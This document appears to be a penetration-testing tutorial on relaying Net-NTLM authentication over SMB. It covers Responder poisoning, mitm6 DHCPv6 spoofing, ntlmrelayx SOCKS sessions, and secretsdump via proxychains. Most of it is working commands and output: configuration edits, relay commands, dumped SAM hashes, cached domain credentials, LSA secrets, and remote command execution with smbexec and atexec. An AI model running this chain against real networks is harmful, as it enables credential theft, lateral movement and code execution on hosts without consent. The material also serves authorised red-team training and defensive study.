SMB Relay
This page deals with gaining code execution by relaying NTLMv1/v2 authentication (Net-NTLM challenge/responses, commonly called "hashes") in a very effective manner. Once you capture one, you can either:
- crack it offline to retrieve the cleartext password
- relay it live to another host to gain code execution on it
The relayed user must have privilege on the target (local admin for SAM dumping or command execution). Note that a Net-NTLM response is not a reusable credential: unlike an NT hash it cannot be passed around later, so relaying has to happen while the victim's connection is still open.
In order to relay, we need valid targets: hosts that accept unsigned SMB sessions, i.e. where SMB signing is not required. By default, Windows workstations and member servers have signing enabled but not required; only domain controllers require it by default (and Windows 11 24H2 now requires it by default as well). Generate the target list with CrackMapExec:
cme smb <networkIP>/<cidr> --gen-relay-list relayTargets.txt
Then edit Responder.conf so Responder does not bind SMB and HTTP itself; ntlmrelayx will listen on those ports instead (the # remarks are annotations, not part of the file):
[Responder Core]
; Servers to start
SQL = On
SMB = Off # Turn this off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off # Turn this off
HTTPS = On
DNS = On
LDAP = On
Then fire up Responder (these switches are from an older Responder release; in current versions -d enables DHCP poisoning rather than NBT-NS domain answers, so check --help before copying):
python Responder.py -I <interface> -r -d -w
Instead of cracking the responses Responder captures, we can relay them to our valid targets to gain code execution. For that purpose, you can use Responder's MultiRelay or Impacket's ntlmrelayx.
With ntlmrelayx, you can keep the relayed sessions open and reuse them (SOCKS mode) instead of executing a one-shot attack.

One-Shot Attack vs Socks Support.
To use SOCKS support, simply add the -socks switch (and -smb2support so SMB2-only clients can be relayed):
./ntlmrelayx.py -tf relayTargets.txt -socks -smb2support
Since MS08-068, it is no longer possible to relay SMB authentication back to the machine it came from (credential reflection attack).
Until now, we have abused LLMNR/NBT-NS name resolution to capture Net-NTLMv2 responses. It works great, but we can increase the effectiveness of relaying by abusing IPv6 as well.
Windows hosts send DHCPv6 requests even on IPv4-only networks, and IPv6 takes priority over IPv4 for DNS. The idea is to answer those DHCPv6 requests and hand out the attacker's IP as the IPv6 DNS server, so that victims resolve names (WPAD in particular) through us and end up authenticating to our machine.

Abusing IPv6 protocol with mitm6.
To use mitm6:
sudo mitm6 -d <domain>
To minimize the impact on the network, leases are short: within 5 minutes of stopping mitm6 they expire and the rogue DNS server disappears from the victims' configuration.
Run ntlmrelayx alongside it with -6 so it also listens on IPv6 (and -wh <hostname> to serve a WPAD file to the clients that now resolve names through us). Many sessions will be established by chaining mitm6 with ntlmrelayx:
ntlmrelayx> socks
Protocol Target Username Port
-------- -------------- ------------------------ ----
SMB 192.168.48.38 VULNERABLE/NORMALUSER3 445
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
SMB 192.168.48.230 VULNERABLE/ADMINISTRATOR 445
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
SMTP 192.168.48.224 VULNERABLE/NORMALUSER3 25
SMTP 192.168.48.224 CONTOSO/NORMALUSER1 25
IMAP 192.168.48.224 CONTOSO/NORMALUSER1 143
...
To interact with these sessions, point proxychains at ntlmrelayx's SOCKS listener (port 1080 by default) in /etc/proxychains.conf:
[ProxyList]
socks4 <yourIP> 1080
Then run Impacket tools through it. The SOCKS proxy already holds an authenticated session for the relayed user, so you can type anything when prompted for a password:
root@kalibeto # proxychains ./secretsdump.py vulnerable/[email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
Password:
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
[*] DPAPI_SYSTEM
0000 01 00 00 00 1C 17 F6 05 23 2B E5 97 95 E0 E4 DF ........#+......
0010 47 96 CC 79 1A C2 6E 14 44 A3 C1 9E 6D 7C 93 F3 G..y..n.D...m|..
0020 9A EC C6 8A 49 79 20 9D B5 FB 26 79 ....Iy ...&y
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
[*] NL$KM
0000 EB 5C 93 44 7B 08 65 27 9A D8 36 75 09 A9 CF B3 .\.D{.e'..6u....
0010 4F AF EC DF 61 63 93 E5 20 C5 4F EF 3C 65 FD 8C O...ac.. .O.<e..
...
With an administrator session you can execute commands with smbexec or atexec, which only need the relayed SMB session:
proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
psexec and wmiexec do not work through the SOCKS session (see references); wmiexec, for instance, needs DCOM/RPC on TCP 135 plus a dynamic port rather than the relayed SMB connection.
You can use SMBClient:
root@kalibeto:~# proxychains smbclient //192.168.48.230/c$ -U vulnerable/Administrator
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Enter VULNERABLE\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Thu Dec 7 19:08:00 2017
Documents and Settings DHS 0 Tue Jul 14 01:08:10 2009
pagefile.sys AHS 1073741824 Thu May 3 16:32:43 2018
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Fri Dec 1 17:16:28 2017
Program Files (x86) DR 0 Fri Dec 1 17:03:57 2017
ProgramData DH 0 Tue Feb 27 15:02:13 2018
Recovery DHS 0 Wed Sep 30 18:00:31 2015
System Volume Information DHS 0 Wed Jun 6 12:24:46 2018
tmp D 0 Sun Mar 25 09:49:15 2018
Users DR 0 Thu Dec 7 19:07:54 2017
Windows D 0 Tue Feb 27 16:25:59 2018
5216767 blocks of size 4096. 609996 blocks available
smb: \>
Many other protocols can be relayed from or to: IMAP, LDAP, MSSQL, HTTP, SMTP, etc. (see references).